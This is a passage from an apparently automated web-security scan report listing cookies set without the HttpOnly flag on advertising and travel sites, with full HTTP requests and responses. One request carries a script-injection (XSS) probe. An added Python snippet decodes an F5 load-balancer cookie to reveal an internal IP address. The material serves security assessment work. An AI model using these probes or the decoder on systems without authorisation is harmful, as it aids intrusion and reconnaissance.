Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; FC1-WCR=132981_3_3Ilow^132982_4_3Iloz; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2%0A3115%3B10%2F30%2F2011%3BGNCT1; V=PpAVCxNh2PJr; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|534301.d1b27788-0a91-4596-9a96-e9dad20b3180.0|538569.6c3113bb-f725-48c4-b3a2-8b266db2aca9.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0|537583.f9bdca69-e609-4297-9145-48ea56a0756c.0"; cw=cw; FC1-WC=59764_1_3KjzP; CDSActionTracking6=5ZvoQhA3FQCr|PpAVCxNh2PJr|538936|3448|7061|59764|134043|106934|3|345|25|premierleague.com|2|8|1|0|2|1|2|EMON2.EHEX1.SMTC1.FACO1.BMBN1.MIWO2.GNCT1|1|1|-HAZoarNoKZDius-txPklIg7Z5oU_7wk6upA9MEPZ1w^|I|3JX6h|3UPoJ; vf=1

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: cw-app607
Set-Cookie: V=PpAVCxNh2PJr; Domain=.contextweb.com; Expires=Wed, 26-Sep-2012 23:49:59 GMT; Path=/
Set-Cookie: cwbh1=357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2%0A3115%3B10%2F30%2F2011%3BGNCT1; Domain=.contextweb.com; Expires=Mon, 01-Oct-2012 23:49:59 GMT; Path=/
Content-Type: image/gif
Date: Sun, 02 Oct 2011 23:49:59 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

14.122. http://bid.openx.net/json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: p (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /json?c=OXM_27838685759&pid=b5bed322-0d4f-f860-f5e9-119078297d65&s=728x90&f=0.2&url=http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6511%26cb%3DINSERT_RANDOM_NUMBER_HERE%26loc%3D&cid=oxpv1%3A34-632-1929-2300-6511&hrid=2b3668b9fdd43266bb92cfe60a9017d3-1317599506 HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HERE&loc=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=ba6bf0b1-8895-45a9-97a1-53f788c412d7; p=1317599466; i=d2a43928-76cd-49ea-b899-b41fb371435f

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: p=1317599506; version=1; path=/; domain=.openx.net; max-age=63072000;

OXM_27838685759({"r":null});

14.123. http://cas.criteo.com/delivery/admeld_map

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cas.criteo.com
Path:   /delivery/admeld_map

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: extid (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /delivery/admeld_map?match=4ec87822-8f33-4202-954a-f6f06a37734b HTTP/1.1
Host: cas.criteo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; __utma=94712387.960097846.1316386536.1316386536.1316386536.1; __utmz=94712387.1316386536.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: image/gif
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Server: Microsoft-IIS/7.5
P3P: CP='CUR ADM OUR NOR STA NID'
Set-Cookie: extid=4ec87822-8f33-4202-954a-f6f06a37734b; domain=.criteo.com; expires=Mon, 02-Apr-2012 23:49:03 GMT; path=/
Date: Sun, 02 Oct 2011 23:49:02 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

14.124. http://cert.travelocity.com/___waseq.img

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cert.travelocity.com
Path:   /___waseq.img

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: BIGipServerC202_80_pool (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function. A BIGipServer* cookie is an F5 BIG-IP load-balancer persistence cookie; in its default (unencrypted) format the value encodes the selected pool member's IPv4 address and port, so the review should also consider whether an internal address is being disclosed.

Request

GET /___waseq.img?Log=1&tntPage=http%3A//www.igougo.com/traveldeals/ratefinder.aspx%3FTypeID%3D1%26SourceID%3DTVLY-dRF-Popunder%26adlt%3D1%26end%3DBostond123a%27%253balert%28document.location%29//08fa278eb24%26rm%3D1%26dest%3DBoston%2C%2520undefined%2520undefined%26strtDate%3D10/04/2011%26endDate%3D10/07/2011&tntTitle=Compare%20Hotel%20Rates%20-%20IgoUgo&tntReferrer=http%3A//burp/show/44&tntCampaignID=24175&tntCampaignName=Host%20Group%20Monitoring%20Campaign%20PROD%20%28Copy%29&tntRecipeID=2&tntRecipeName=Prod&tntTrafficType=0&tntOfferID=19910&tntMbox=RateFinderMboxHotels&tntPCID=1317601622475-177474.19&tntSessionID=1317606736569-208906&tntFirstSession=false&tntPageID=1317606736569-208906&tntTime=1317606738116 HTTP/1.1
Host: cert.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Bostond123a'%3balert(document.location)//08fa278eb24&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998; mbox=session#1317600481056-80236#1317605014|PC#1317600481056-80236.19#1318812754|check#true#1317603214

Response

HTTP/1.1 403 Forbidden
Date: Mon, 03 Oct 2011 00:19:05 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 333
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerC202_80_pool=129900204.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /___waseq.img
on this server.</p>
<
...[SNIP]...
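Reviewing the contents of the BIGipServerC202_80_pool cookie from the response above, as an added example for this finding (not part of the report): the decoder below implements the documented BIG-IP default persistence-cookie layout, "<IPv4 as little-endian 32-bit integer>.<port as little-endian 16-bit integer>.0000", and returns the backend the load balancer pinned this client to. The interpretation that the cookie uses that default format is an assumption made here from the name prefix and the value's shape; encrypted cookies and the IPv6 or route-domain variants use different layouts and are reported as undecodable. The sample header block is constructed around the Set-Cookie line shown in the 403 response.

```python
"""Decode an F5 BIG-IP persistence cookie (default, unencrypted format).

Added example for finding 14.124; not part of the report. Assumes the
documented BIG-IP default layout "<ip>.<port>.0000" where both numbers are
little-endian integers. Encrypted, IPv6 and route-domain variants are not
handled and yield None.
"""
import ipaddress
import re
import struct

F5_COOKIE_RE = re.compile(r"^(\d+)\.(\d+)\.0000$")


def decode_bigip_cookie(value: str):
    """Return (ip, port) for a default-format BIGipServer* value, or None.

    The IPv4 address is stored as a little-endian 32-bit integer and the
    port as a little-endian 16-bit integer, so both are byte-swapped here.
    """
    m = F5_COOKIE_RE.match(value.strip())
    if not m:
        return None
    ip_int, port_int = int(m.group(1)), int(m.group(2))
    if ip_int > 0xFFFFFFFF or port_int > 0xFFFF:
        return None  # out of range for the default layout; treat as undecodable
    ip = ipaddress.IPv4Address(struct.pack("<I", ip_int))
    (port,) = struct.unpack(">H", struct.pack("<H", port_int))
    return str(ip), port


def find_bigip_cookies(raw_headers: str) -> dict:
    """Map each BIGipServer* cookie set in a raw header block to its decoded backend."""
    found = {}
    for line in raw_headers.splitlines():
        key, sep, val = line.partition(":")
        if not sep or key.strip().lower() != "set-cookie":
            continue
        name, _, rest = val.strip().partition("=")
        if name.startswith("BIGipServer"):
            cookie_value = rest.split(";", 1)[0]
            found[name] = decode_bigip_cookie(cookie_value)
    return found


# Constructed sample built around the Set-Cookie line from the 403 response.
SAMPLE = """\
HTTP/1.1 403 Forbidden
Server: Apache
Set-Cookie: BIGipServerC202_80_pool=129900204.20480.0000; path=/
Content-Type: text/html; charset=iso-8859-1
"""

if __name__ == "__main__":
    for name, backend in find_bigip_cookies(SAMPLE).items():
        print(name, "->", backend)
```

For the value captured here the decoder yields 172.30.190.7 on port 80, an RFC 1918 address, which is the kind of internal-topology leak the "review the contents of the cookie" advice is meant to catch; F5 supports encrypting this cookie if that disclosure matters to the owner.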

14.125. http://clk.atdmt.com/go/352348532/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /go/352348532/direct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: ach00 and ach01 (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/352348532/direct;ai.209087168;ct.1/01 HTTP/1.1
Host: clk.atdmt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://spe.atdmt.com/ds/DWDWCCMEXCME/Collective_Trade_728x90.swf?ver=1&clickTag1=http://clk.specificclick.net/click/v=5;m=2;l=24038;c=178619;b=1058368;ts=20111002201331;dct=http://clk.atdmt.com/go/352348532/direct;ai.209087168;ct.1/01&clickTag=http://clk.specificclick.net/click/v=5;m=2;l=24038;c=178619;b=1058368;ts=20111002201331;dct=http://clk.atdmt.com/go/352348532/direct;ai.209087168;ct.1/01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=bb2&W=1; NAP=V=1.9&E=b58&C=FWWeOdQjav4-01BzsznEtT1CJyfe8xjK06kPzseNod3oP8GMWbUKsw&W=1; ach00=eb2a/1c72:ec40/2f33:233cf/1a43a; ach01=da2c1b5/1c72/e2f178b/eb2a/4e67d23e:da2c0cc/1c72/85c9f4b/eb2a/4e67d832:ca9bfb6/2f33/14f1ae7d/ec40/4e67d8e2:e1f70b5/1a43a/1403b670/233cf/4e73f21b; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.cmegroup.com/advance/
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: ach00=eb2a/1c72:ec40/2f33:233cf/1a43a:8bff/7db; expires=Wednesday, 02-Oct-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=da2c1b5/1c72/e2f178b/eb2a/4e67d23e:da2c0cc/1c72/85c9f4b/eb2a/4e67d832:ca9bfb6/2f33/14f1ae7d/ec40/4e67d8e2:e1f70b5/1a43a/1403b670/233cf/4e73f21b:c766ac0/7db/15006974/8bff/4e89013e; expires=Wednesday, 02-Oct-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Mon, 03 Oct 2011 00:26:39 GMT
Connection: close


14.126. http://cms.ad.yieldmanager.net/v1/cms

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cms.ad.yieldmanager.net
Path:   /v1/cms

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: S (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /v1/cms?esig=1~862d802dd86fb59368388ad078a7f298ddbbd0b7&nwid=10000424978&sigv=1 HTTP/1.1
Host: cms.ad.yieldmanager.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://cdn.turn.com/server/ddc.htm?uid=2944787775510337379&mktid=&mpid=&fpid=5&rnd=8772088100672849718&nu=n&sp=y&ctid=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii&t=274

Response

HTTP/1.1 302 Found
Date: Mon, 03 Oct 2011 01:53:05 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: S=s=2a9iqdd78i5c1&t=1317606785;path=/; expires=
Location: http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/?xid=u02DzKG_.KFBo5S2yyqljPCE
Cache-Control: private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 792

HTTP/1.1 302 Found
Date: Mon, 03 Oct 2011 01:53:05 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PU
...[SNIP]...

14.127. http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/dcs.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ctix8.cheaptickets.com
Path:   /dcs4mzzicc2ep3maahjx8kl5c_7e2i/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: ACOOKIE (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcs4mzzicc2ep3maahjx8kl5c_7e2i/dcs.gif?&dcsdat=1317600406178&dcssip=www.orbitz.com&dcsuri=/&page=/&WT.tz=-5&WT.bh=19&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Orbitz%20Travel:%20Airline%20Tickets,%20Cheap%20Hotels,%20Car%20Rentals,%20Vacations%20%26%20Cruises&WT.js=Yes&WT.jv=1.5&WT.bs=1074x850&WT.fi=Yes&WT.fv=10.3&WT.dl=0&WT.sv=egapp27p&WT.wtsv=1&WT.co_f=50.23.123.106-1472814720.30179680&WT.vt_f=1&WT.vt_f_a=1&WT.vt_f_s=1&WT.vt_f_d=1&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_sid=50.23.123.106-1472814720.30179680.1317600406325&hostname=www.orbitz.com&avid=10644782471317600406435&tab=QS&strf=7&b=A&wsid=71A4AF1632EAB3B1F4E0C49149EEC65B&dsrc=7&pos=ORBC&ASimp=1&wtEvtSrc=www.orbitz.com/ HTTP/1.1
Host: ctix8.cheaptickets.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:06:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtMTQ3MjgxNDcyMC4zMDE3OTY4MAAAAAAAAAABAAAAPXQAAJn8iE6Z/IhOAQAAABQuAACZ/IhOmfyITgAAAAA-; path=/; expires=Thu, 30-Sep-2021 00:06:49 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

14.128. http://ctix8.cheaptickets.com/dcsdlg96i00000clc5ljt8xox_8x1x/dcs.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ctix8.cheaptickets.com
Path:   /dcsdlg96i00000clc5ljt8xox_8x1x/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: ACOOKIE. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsdlg96i00000clc5ljt8xox_8x1x/dcs.gif?&WT.co_f=50.23.123.106-1472814720.30179680&WT.vt_sid=50.23.123.106-1472814720.30179680.1317600406325&WT.Site=www.orbitz.com&WT.tz=-5&WT.bh=19&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=hotel200&WT.js=Yes&WT.jv=1.5&WT.bs=700x700&WT.fi=Yes&WT.fv=10.3&WT.dl=20&WT.si_p=SR&WT.si_n=HOT&WT.tx_e=s&WT.pn_sku=HOT&WT.mc_id=C11287x600&WT.si_x=10&WT.wtsv=1&WT.vt_f_tlh=1317600638&hostname=www.orbitz.com&pos=ORB&b=A&wtEvtSrc=hotel200&owwPage=/shop/hotelsearch&LNG=en_US&avid=10644782471317600406435&zip=NA&HImp=10417,1,429.00,NA,NA;319853,2,308.65,TLICRN,NA;230082,3,383.33,STDAY9,NA;10442,4,339.15,TJDHS9,NA;44756,5,339.00,NA,NA;29958,6,345.67,NA,NA;287572,7,700.00,NA,NA;29957,8,399.00,NA,NA;29959,9,445.67,NA,NA;44414,10,63.20,BBYD4L,NA;80231,11,181.67,NA,NA;283875,12,375.67,NA,NA;58796,13,401.49,NA,NA;27748,14,359.14,NA,NA;24646,15,349.00,NA,NA;248217,16,58.50,JK29EZ,NA;83678,17,242.33,NA,NA;27609,18,139.99,NA,NA;21445,19,119.00,NA,NA;5022,20,99.99,NA,NA;5408,21,314.11,MAUQSF,NA;69512,22,365.67,NA,NA;267914,23,72.10,8964YV,NA;292301,24,445.67,NA,NA;12248,25,409.01,NA,NA&rs=drf-global.com&odp=NA_BOS&kwd=Boston,United%20States&sts=POI&d=BOS&promoId=319853,TLICRN,NA;230082,STDAY9,NA;10442,TJDHS9,NA;44414,BBYD4L,NA;248217,JK29EZ,NA;5408,MAUQSF,NA;267914,8964YV,NA&hrg=1&srct=1&dd=10/04/2011&wsid=71A4AF1632EAB3B1F4E0C49149EEC65B&ttu=[1]&rqid=wl000000000000005fc36671000a2f42&lpid=plhot&ud=11231&pa=NA&strf=1&cl=NA&srpv=1&rd=10/07/2011&ng=3&sop=NA&rm=1&tx=A1&spT=ASP,0,&ord=BV&tt=[A]&dro=1&pJS=9036&pHT=56127&pDM=56134&pAgSt=20880&pAgFn=66517&pOL=82128&pUA=Mozilla/5.0%20(Windows%20NT%206.1;%20WOW64)%20AppleWebKit/535.1%20(KHTML,%20like%20Gecko)%20Chrome/14.0.835.187%20Safari/535.1&pJSP=409&dcsdat=1317600638767&dcssip=www.orbitz.com&dcsuri=/shop/hotelsearch&dcsqry=%3Ftype=hotel%26hotel.keyword.key=Boston%2CUnited%20States%26hotel.rooms[0].adlts=1%26hotel.type=keyword%26hotel.chkin=10/04/11%26hotel.chkout=10/07/11%26search=Search%26WT.mc_ev=click%26WT.mc_id=o_igo_merch_city_dated%26gcid=C11287x600-CYBoston,United%20States%26lpid=plhot&dcsref=http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf%3Flob=HOTEL%26advertiserName=orbitz%26grp=9705%26placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder%26url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B141652382%3B20702477%3Ba%3Fhttp%3A%2F%2Fwww.orbitz.com%2Fpsi%3Ftype%3Dhotel%26market%3D%24%7Bcity%7D%2C%24%7Bcountryn%7D%26checkin%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm-dd%22%7D%26checkout%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm-dd%22%7D%26guests%3D%24%7Badults%7D%26rooms%3D%24%7Brooms%7D%26WT.mc_id%3Do_igo_merch_city_dated%26WT.mc_ev%3Dclick%26gcid%3DC11287x600-CY%24%7Bcity%7D%2C%24%7Bcountryn%7D%26pid=c3919e40-e5b8-49f8-b876-4fed1f31968f%26sid=bfa7dd53-c988-458c-86df-52443affccb8%26uid=20d9c1fc-61a4-45f0-9524-380e68994c01%26widget=H_PopUnder%26pti=default%26src=none%26ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75%26ctx=92aa9504-b6eb-4091-8b93-6582f63d9555%26ccn=1%26cgn=153%26pos=0%26aii=e3898191-1452-431e-82b6-c9f881ca9a4c%26%24cc=US%26%24rc=US%26%24adults=1%26%24destination=Boston%2C%20MA%20Massachusetts%26%24glsId=440663%26%24city=Boston%26%24countryn=United%20States%26%24countryc=US%26%24staten=Massachusetts%26%24statec=MA%26%24lob=HOTEL%26%24rooms=1%26%24context=92aa9504-b6eb-4091-8b93-6582f63d9555%26%24widget=H_PopUnder%26%24l=9%26%24departureDate=2011-10-04%26%24returnDate=2011-10-07%26%24aucnt=0%26%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f%26%24sid=bfa7dd53-c988-458c-86df-52443affccb8%26adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a%26 HTTP/1.1
Host: ctix8.cheaptickets.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtMTQ3MjgxNDcyMC4zMDE3OTY4MAAAAAAAAAABAAAAPXQAAJr8iE6Z/IhOAQAAABQuAACa/IhOmfyITgAAAAA-

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:11:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtMTQ3MjgxNDcyMC4zMDE3OTY4MAAAAAAAAAACAAAAPXQAAML9iE6Z/IhO/ucAAML9iE6D/YhOAQAAABQuAADC/YhOmfyITgAAAAA-; path=/; expires=Thu, 30-Sep-2021 00:11:46 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

14.129. http://ctix8.cheaptickets.com/dcstaccdt4h7cnabui8c1i31a_8m2q/dcs.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ctix8.cheaptickets.com
Path:   /dcstaccdt4h7cnabui8c1i31a_8m2q/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: ACOOKIE. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcstaccdt4h7cnabui8c1i31a_8m2q/dcs.gif?&WT.Site=www.cheaptickets.com&WT.tz=-5&WT.bh=19&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=hotel200&WT.js=Yes&WT.jv=1.5&WT.bs=1074x906&WT.fi=Yes&WT.fv=10.3&WT.dl=0&WT.si_p=SR&WT.si_n=HOT&WT.tx_e=s&WT.pn_sku=HOT&WT.mc_id=C16036x354&WT.si_x=10&WT.wtsv=1&WT.co_f=50.23.123.106-1472814720.30179680&WT.vt_f=1&WT.vt_f_s=1&WT.vt_f_d=1&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_sid=50.23.123.106-1472814720.30179680.1317602302061&hostname=www.cheaptickets.com&owwPage=/shop/hotelsearch&LNG=en_US&avid=7567558764917771317602252&zip=NA&HImp=317971,1,129.00,NA,NA;319853,2,373.06,TLICRN,NA;50080,3,70.28,V1P3RZ,NA;21445,4,139.00,NA,NA;83803,5,96.86,NA,NA;32679,6,175.00,NA,NA;2042,7,143.10,NA,NA;7222,8,197.10,NA,NA;65358,9,99.99,NA,NA;126192,10,90.74,NA,NA;16123,11,118.16,NA,NA;28337,12,61.70,NA,NA;46267,13,134.99,NA,NA;48073,14,107.14,NA,NA;130650,15,189.00,NA,NA;42996,16,102.85,NA,NA;9964,17,124.99,NA,NA;229656,18,456.43,NA,NA;104806,19,149.00,NA,NA;11852,20,117.71,NA,NA;114000,21,149.00,NA,NA;235019,22,421.86,NA,NA;35100,23,417.14,NA,NA;206519,24,129.00,NA,NA;209228,25,200.00,NA,NA&rs=www.trip.com&odp=NA_BOS&kwd=bos&sts=AIR&b=B&d=BOS&promoId=319853,TLICRN,NA;50080,V1P3RZ,NA&hrg=1&srct=1&dd=10/09/2011&wsid=E880BFD3C49D42E3&ttu=[1]&rqid=wl00000000000000ba0b0698000a5f08&lpid=plhot&pos=CTIX&ud=36053&pa=NA&strf=1&cl=NA&srpv=1&trf=1&rd=10/16/2011&ng=7&sop=NA&rm=1&tx=A1&spT=ASP,0,&ord=BV&tt=[A]&dro=1&wtEvtSrc=hotel200&dcsdat=1317602302059&dcssip=www.cheaptickets.com&dcsuri=/shop/hotelsearch&dcsqry=%3Ftype=hotel%26hotel.keyword.key=bos%26hotel.rooms[0].adlts=1%26hotel.type=keyword%26hotel.chkin=10/09/11%26hotel.chkout=10/16/11%26search=Search%26DCSext.mc_kw=%26WT.mc_ev=click%26WT.mc_id=c_trip_hot%26gcid=C16036x354%26lpid=plhot&dcsref=http://www.trip.com/hotels.html HTTP/1.1
Host: ctix8.cheaptickets.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.cheaptickets.com/shop/hotelsearch?type=hotel&hotel.keyword.key=bos&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/09/11&hotel.chkout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
